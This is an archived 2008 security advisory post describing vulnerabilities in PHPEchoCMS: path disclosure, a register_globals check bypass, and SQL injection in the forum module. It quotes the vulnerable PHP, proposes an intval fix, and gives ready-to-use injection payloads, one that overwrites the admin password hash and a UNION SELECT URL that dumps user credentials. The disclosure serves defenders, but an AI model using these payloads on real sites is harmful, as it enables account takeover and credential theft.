Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

JoomlaFlash Component Multiple Remote File Inclusion

Gradman <= 0.1.3  (agregar_info. php?tabla=) Local File Inclusion Exploit

[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10

[waraxe-2008-SA#062] - Multiple Sql Injections in MyBB 1.2.10

From:	HACKERS PAL <security_(at)_soqor.net>
Date:	17.01.2008
Subject:	PHPEchoCMS Multible remote vulnerabilitis

Hello,,

PHPEchoCMS Multible remote vulnerabilitis

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


fiest thing ..
full path
kernel/init.php
modules/admin/index.php
..
every file to be included has to have the value of the variable $BASE_LOAD
but if the register globals is on then you can use in the browser like this ..
modules/files/index.php?BASE_LOAD=1

it will continue .. and other files too

modules/forum/index.php
lines [31-49]
   if (@$_POST['post']=='thread')
   {
       if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])
       {
                   // Add the thread to the specified section
            $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', '".addslashes($_POST['id'])."', '-1',
'".addslashes($_POST['title']).
             "', '".str_replace("\n", "<br>", addslashes($_POST['contents']))."',
'".$_SESSION['username']."','".
date("d-m-Y H:i")."', '0')";
             $res = query($ins, 1);
             $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE
`id`=".addslashes($_POST['id']);
             $res = query($ins, 1);
             $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);
             redirect ("index.php?module=forum&show=thread&id=".$nb);
        }
        else
        {
             $content = $mlang['017'];

        }
   }

see
             $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE
`id`=".addslashes($_POST['id']);

could be modified to an update query by posting value of id as next
id=union update members set password=[value] where id=1

offcourse value here should be md5 hash .. and no brackets so the query will be ok :)


lines[138-142]

   elseif (@$_GET['show']=='thread' && $_GET['id'])
   {
            // Show a thread and its replies (child-threads)

           $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id=".addslashes($_GET['id']), 4);

replace with
   elseif (@$_GET['show']=='thread' && $_GET['id'])
   {
            // Show a thread and its replies (child-threads)

           $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id='".intval($_GET['id'])."'", 4);


exploit
index.php?module=forum&show=thread&id=-
1%20union%20select%201,2,3,username,password,username,password,
8%20from%20phpecms_users%20where%20id=1/*



# WwW.SoQoR.NeT